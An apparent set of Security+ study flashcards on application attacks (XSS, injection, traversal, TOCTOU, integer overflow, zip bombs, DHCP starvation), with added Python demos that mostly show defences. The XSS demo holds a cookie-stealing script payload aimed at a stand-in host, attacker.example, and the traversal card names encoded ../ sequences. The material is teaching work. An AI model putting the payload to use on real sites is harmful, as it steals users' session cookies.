Obj 1.3 - Indicators of Application Attacks Flashcards

1
Q

Privilege Escalation

A

gaining a higher level of access to a system than the attacker was granted, then using that access to exploit it

can be vertical - a normal user obtains admin/root rights
can be horizontal - the attacker reaches another user's account or data at the same privilege level

2
Q

Cross-site scripting

A

injects script (usually JavaScript) into a web page through input that is not validated or output that is not encoded; the script then runs in other users' browsers with the site's own origin

Two types (a third, DOM-based, is often listed as well):

  • persistent (stored)
  • non-persistent (reflected)
3
Q

Non-persistent (reflected)

A

an XSS attack whose payload is carried in the request (typically a crafted URL) and echoed back in the response; nothing is saved on the server, so the victim must be tricked into clicking the specific link

4
Q

persistent (stored)

A

an XSS attack whose payload is saved on the server (a comment, profile field, forum post) and served to every visitor of the affected page
every visitor's browser runs the attacker's script without clicking anything
spreads quickly when the infected content is shared, e.g. through "sharing pages" on social media
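
The reflected and stored variants side by side, as an added Python example that is not part of the original flashcards: a search page that echoes the ?q= parameter (reflected) and a comment board that persists whatever users post (stored), each shown without and with output encoding. The cookie-stealing payload, host names and helper names are constructed for the demo.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed cookie-stealing payload used for both demonstrations (not taken from the page).
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def crafted_search_url(payload: str) -> str:
    """Build the link an attacker would send to the victim for a reflected XSS."""
    return "https://shop.example/search?q=" + quote(payload)


def search_term(url: str) -> str:
    """Pull the ?q= parameter out of a request URL (percent-decoded, as a web framework would)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def reflected_page_vulnerable(url: str) -> str:
    """Reflected XSS: the search term is echoed into the HTML response unencoded."""
    return "<h1>Results for " + search_term(url) + "</h1>"


def reflected_page_fixed(url: str) -> str:
    """Same page with output encoding: '<' becomes '&lt;' and the payload is inert text."""
    return "<h1>Results for " + html.escape(search_term(url)) + "</h1>"


class CommentBoard:
    """Stored-XSS stand-in: comments persist server side and are rendered to every visitor."""

    def __init__(self, escape_output: bool) -> None:
        self.escape_output = escape_output
        self.comments = []

    def post(self, text: str) -> None:
        self.comments.append(text)  # no validation on the way in

    def render(self) -> str:
        items = (html.escape(c) if self.escape_output else c for c in self.comments)
        return "<ul>" + "".join("<li>" + c + "</li>" for c in items) + "</ul>"


def contains_active_script(page: str) -> bool:
    """Crude check: does the rendered HTML still contain a live <script> tag?"""
    return "<script>" in page.lower()
```

The reflected case needs the victim to open crafted_search_url(PAYLOAD); the stored case needs one post() by the attacker, after which every render() delivers the script. Output encoding at render time neutralises both; validating on input alone does not, because stored data can also arrive through other channels.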

5
Q

injection types

A

SQL
DLL
LDAP
XML

6
Q

SQL injection

A

Structured Query Language

most common injection type
exploits site inputs that are concatenated into a database query without validation or parameterization, so the input is executed as SQL rather than treated as data

7
Q

DLL injection

A

Dynamic Link Library

forcing a running process to load a malicious DLL (hijacking the application), so the attacker's code runs inside it
the injected code inherits whatever escalated privileges the host application has
used to evade process-based defenses, because the malicious code runs inside a trusted process

8
Q

LDAP injection

A

Lightweight Directory Access Protocol

similar to SQL injection
exploits web apps that build LDAP search filters from user input without escaping it
changes the meaning of the filter: bypasses authentication, returns results to unauthorized queries, modifies content in the LDAP tree

9
Q

null pointer dereference || pointer/object dereference attack

A

the program uses a pointer (object reference) that is null or otherwise invalid, e.g. because attacker-supplied input made a lookup fail

can cause application crash, debug info display (stack traces, memory addresses), DoS

10
Q

directory traversal

A

reading files outside of the directory the website is meant to serve from

e.g. users shouldn't be able to browse the Windows folder through the web server

../../../ sequences (or their URL-encoded forms such as %2e%2e%2f) move the requested path up and out of the web root

either a web server or a web application vulnerability
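
The check a file-serving handler needs, as an added Python example that is not from the flashcards: decode the requested path, resolve it against the web root, and refuse anything whose real location lies outside. The temporary web root, its index.html and the escape symlink are constructed for the demo; the function names are the example's own.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under_root(web_root: str, requested_path: str):
    """Map a requested URL path onto the filesystem; return the real path if it stays
    inside web_root, else None.

    Percent-decoding first catches encoded dot segments (%2e%2e%2f); realpath collapses
    '..' and follows symlinks, so the prefix check is made on where the file really lives.
    """
    root_real = os.path.realpath(web_root)
    # a leading slash would make join() discard the root entirely
    relative = unquote(requested_path).lstrip("/\\")
    candidate = os.path.realpath(os.path.join(root_real, relative))
    if candidate == root_real or candidate.startswith(root_real + os.sep):
        return candidate
    return None


def demo_web_root() -> str:
    """Constructed site: a web root holding index.html plus a symlink pointing outside it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    # symlink inside the root that points at the parent directory
    os.symlink(os.path.dirname(root), os.path.join(root, "escape"))
    return root


def serves(web_root: str, requested_path: str) -> bool:
    """True when the request would be answered from inside the web root."""
    return resolve_under_root(web_root, requested_path) is not None
```

A plain string check for ".." is not enough: encoded forms, mixed separators and symlinks inside the root all get past it, which is why the decision is made on the resolved real path.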

11
Q

SSL Stripping

A

HTTP downgrade + on-path attack

the on-path attacker keeps the victim's connection on plain HTTP (removes the "s" from https in links and redirects) while speaking HTTPS to the real site, so it can read and alter the traffic
ssl = secure sockets layer
mitigation: HSTS, so the browser refuses to talk plain HTTP to that site

12
Q

buffer overflows

A

writing more data into a buffer than it can hold, so the excess overwrites adjacent memory locations.
lets an attacker overwrite data, overwrite control information such as return addresses, or place and run malicious code; often leads to privilege escalation.
can corrupt data, crash the program, or cause the execution of malicious code.

13
Q

race condition

A

when two operations run concurrently on a shared resource and the result depends on which one finishes first; correctness rests on timing that an attacker can influence

14
Q

TOCTOU (time of check, time of use) attack

A

a race condition exploit

taking advantage of any gap in time between a "check" of valid data and the "use" of that data: the attacker changes the data (or what a path name points to) inside that gap, so the check passes but the use operates on something else.

race conditions in general have caused:
reboot loops (Mars Pathfinder rover, 1997)
communication failures (Northeast blackout of 2003)
or death (Therac-25 radiation therapy machine, 1980s)
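
The check-then-use gap on a file path, and the fix of checking the object you actually use, as an added Python example that is not from the flashcards. The attacker winning the race is simulated by a callback invoked inside the window; the directory layout, file names and function names are constructed for the demo. It relies on O_NOFOLLOW, so it runs on Linux and macOS.

```python
import os
import stat
import tempfile


def read_if_regular_vulnerable(path: str, attacker_swaps=None) -> bytes:
    """Check-then-use on a path name: the check and the open resolve the name separately."""
    if os.path.islink(path) or not os.path.isfile(path):   # time of check
        raise PermissionError("refusing symlink or non-regular file")
    if attacker_swaps:                                      # the race window; attacker wins here
        attacker_swaps()
    with open(path, "rb") as f:                             # time of use: follows whatever the name points to now
        return f.read()


def read_if_regular_fixed(path: str, attacker_swaps=None) -> bytes:
    """Open first (refusing symlinks), then check the descriptor you are about to use: no gap to race."""
    if attacker_swaps:
        attacker_swaps()
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)        # fails with ELOOP if the name is now a symlink
    try:
        st = os.fstat(fd)                                   # checks the opened object, not the name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)


def read_fixed_or_none(path: str, attacker_swaps=None):
    """Wrapper for the demo: None when the hardened reader refuses."""
    try:
        return read_if_regular_fixed(path, attacker_swaps)
    except OSError:
        return None


def build_scenario():
    """Constructed layout: a harmless upload next to a secret; the attacker replaces the upload
    with a symlink to the secret during the window."""
    d = tempfile.mkdtemp(prefix="toctou-")
    secret = os.path.join(d, "secret.txt")
    upload = os.path.join(d, "upload.txt")
    with open(secret, "wb") as f:
        f.write(b"SECRET")
    with open(upload, "wb") as f:
        f.write(b"harmless")

    def swap():
        os.remove(upload)
        os.symlink(secret, upload)

    return upload, swap
```

The vulnerable reader passes its own check and then reads the secret, because the name was re-resolved at use time. The fixed reader does not trust the name at all: it opens without following symlinks and validates the descriptor it will read from, so the swap only produces an error.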
15
Q

memory leak

A
memory that is no longer needed is never released back to the system
the process's memory use grows over time
eventually all available memory is used
the application or system crashes
e.g. DoS
16
Q

integer overflow

A

an arithmetic result larger than the integer type can hold, so the value wraps around (e.g. a 32-bit length check passes because offset + length wrapped to a small number)

always validate numeric input and check arithmetic for overflow before using the result as a size, index or length
can cause: buffer overflows (undersized allocations), DoS, bypassed bounds checks
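
Two classic 32-bit wrap-arounds and their checked forms, as an added example that is not from the flashcards. Python integers do not overflow, so 32-bit unsigned arithmetic is modelled by masking to the low 32 bits, the way a C compiler's result would look; the function names and numbers are the example's own.

```python
U32_MAX = 0xFFFFFFFF


def u32(value: int) -> int:
    """Model 32-bit unsigned arithmetic: keep only the low 32 bits, as C does on overflow."""
    return value & U32_MAX


def alloc_size_unchecked(count: int, elem_size: int) -> int:
    """Mirrors `size_t n = count * elem_size;` on a 32-bit target: the product silently wraps,
    so a huge element count yields a tiny allocation that the later copy loop overruns."""
    return u32(count * elem_size)


def alloc_size_checked(count: int, elem_size: int):
    """Divide instead of multiply: the check itself cannot overflow. None means reject."""
    if elem_size == 0:
        return 0
    if count > U32_MAX // elem_size:
        return None
    return count * elem_size


def length_check_vulnerable(buffer_len: int, header_len: int, body_len: int) -> bool:
    """Classic parser bug: `if (header_len + body_len <= buffer_len)` with an attacker-controlled body_len."""
    return u32(header_len + body_len) <= buffer_len


def length_check_fixed(buffer_len: int, header_len: int, body_len: int) -> bool:
    """Rearranged so no addition can wrap: compare body_len against the space left after the header."""
    if header_len > buffer_len:
        return False
    return body_len <= buffer_len - header_len
```

count = 0x40000001 with 4-byte elements wraps to a 4-byte allocation, and body_len = 0xFFFFFFF8 added to a 16-byte header wraps to 8, which sails through a 64-byte bounds check; both checked versions reject the same inputs.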

17
Q

API attacks

A

APIs are a relatively new, often less-scrutinized communication path into an application

can cause:

  • exposing sensitive data
  • DoS
  • intercepted comms
  • privileged access
18
Q

Resource exhaustion

A

a specialized DoS attack that uses up all the available resource of a device so that apps can’t run.

can be accomplished by a single device over low bandwidth.

19
Q

ZIP bomb

A

a resource exhaustion attack

sending a zip file that decompresses to an unfathomable size

42 KB .zip -> 4.5 petabytes (4,500 terabytes)
antivirus will usually identify these
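
Two checks an extractor should make, as an added Python example that is not from the flashcards: triage from the central directory (declared size and compression ratio) before extracting anything, then metering the bytes actually produced, because declared sizes can lie. The "bomb" here is a constructed single member of zeros that deflates roughly 1000:1, not the nested 42.zip the card refers to; the thresholds and function names are the example's own.

```python
import io
import zipfile

MiB = 1024 * 1024


def build_bomb_like_zip(uncompressed_mib: int = 16) -> bytes:
    """Constructed stand-in for a zip bomb: one member of zeros that deflates to a few KiB."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("zeros.bin", b"\x00" * (uncompressed_mib * MiB))
    return buf.getvalue()


def build_ordinary_zip() -> bytes:
    """Constructed normal archive: 1 KiB of poorly compressible bytes, ratio close to 1."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("data.bin", bytes(range(256)) * 4)
    return buf.getvalue()


def inspect_archive(data: bytes, max_total: int = 64 * MiB, max_ratio: float = 100.0) -> dict:
    """Pre-extraction triage from the central directory: declared total size and compression ratio."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        infos = z.infolist()
        total = sum(i.file_size for i in infos)
        packed = sum(i.compress_size for i in infos)
    ratio = total / max(packed, 1)
    return {
        "members": len(infos),
        "declared_total": total,
        "ratio": ratio,
        "accept": total <= max_total and ratio <= max_ratio,
    }


def extract_within_budget(data: bytes, budget: int) -> bool:
    """Declared sizes can be forged, so also meter the bytes actually produced and abort past the budget."""
    produced = 0
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            with z.open(info) as member:
                while True:
                    chunk = member.read(64 * 1024)
                    if not chunk:
                        break
                    produced += len(chunk)
                    if produced > budget:
                        return False        # stop before disk or memory is exhausted
    return True
```

A real nested bomb defeats the first check only if the outer layer looks ordinary, which is why the metered extraction has to apply to every layer that gets unpacked.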

20
Q

DHCP starvation

A

a network-based resource exhaustion attack
floods the network with "new devices" requesting IP addresses (really it's one attacker using a new spoofed MAC address for each request)
the DHCP server quickly hands out all available IP addresses in the scope, preventing real new devices from connecting
mitigation: configure the switch to limit DHCP requests, i.e. DHCP snooping plus port security that caps the number of MAC addresses per port.

btw, it’s Dynamic Host Configuration Protocol
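
The detection side, as an added Python example that is not from the flashcards: count distinct client MAC addresses per interface in a sliding window over DHCPDISCOVER log lines, since a starvation tool produces a fresh MAC on every request. The log format is modelled on ISC dhcpd's "DHCPDISCOVER from <mac> via <interface>" lines; the timestamps, MAC addresses, interface names and threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Modelled on ISC dhcpd's "DHCPDISCOVER from <mac> via <iface>"; timestamps are assumed ISO 8601.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) DHCPDISCOVER from (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) via (?P<iface>\S+)",
    re.IGNORECASE,
)


def parse_discover(line: str):
    """Return (timestamp, mac, iface) for a DHCPDISCOVER line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["mac"].lower(), m["iface"]


def starvation_alerts(lines, window=timedelta(seconds=60), max_new_clients=10):
    """Flag interfaces that saw more distinct client MACs inside any window than a LAN plausibly would.

    A legitimate burst (a room of laptops powering on) stays under the threshold; a starvation
    tool cycles MACs on every request, so the distinct count climbs within seconds.
    Returns {iface: peak distinct MACs} for the interfaces that crossed the threshold.
    """
    events = defaultdict(list)
    for line in lines:
        parsed = parse_discover(line)
        if parsed:
            ts, mac, iface = parsed
            events[iface].append((ts, mac))
    alerts = {}
    for iface, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            distinct = len({mac for _, mac in evs[start:end + 1]})
            if distinct > max_new_clients:
                alerts[iface] = max(alerts.get(iface, 0), distinct)
    return alerts


def sample_log():
    """Constructed sample: three real laptops on eth1, a starvation tool cycling MACs on eth0."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i, mac in enumerate(["3c:22:fb:10:20:01", "3c:22:fb:10:20:02", "3c:22:fb:10:20:03"]):
        ts = (base + timedelta(seconds=5 * i)).isoformat()
        lines.append(f"{ts} DHCPDISCOVER from {mac} via eth1")
    for i in range(40):   # 40 requests in 20 seconds, each from a never-seen MAC
        mac = "de:ad:be:ef:%02x:%02x" % (i // 256, i % 256)
        ts = (base + timedelta(milliseconds=500 * i)).isoformat()
        lines.append(f"{ts} DHCPDISCOVER from {mac} via eth0")
    lines.append("2024-05-01T10:00:03 dhcpd: DHCPOFFER on 10.0.0.5 to 3c:22:fb:10:20:01 via eth1")
    return lines
```

The threshold is per interface because a starvation flood is confined to the port or VLAN the attacker sits on; the same count of MACs across a whole campus would be normal.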

21
Q

replay attack

A

intercepted data (e.g. an authentication exchange) is captured and later retransmitted or delayed, sometimes as part of spoofing by IP packet substitution
usually carried out by an on-path (man-in-the-middle) attacker; defeated by timestamps, nonces or sequence numbers that make each message valid only once

22
Q

session replay attack

A

using a captured, still-active session ID (cookie or token) to pose as the victim and talk directly to a service without a username or password.
mitigate: protect session IDs in transit with TLS (SSL is deprecated), and limit their value with short expiry and Secure/HttpOnly cookie flags.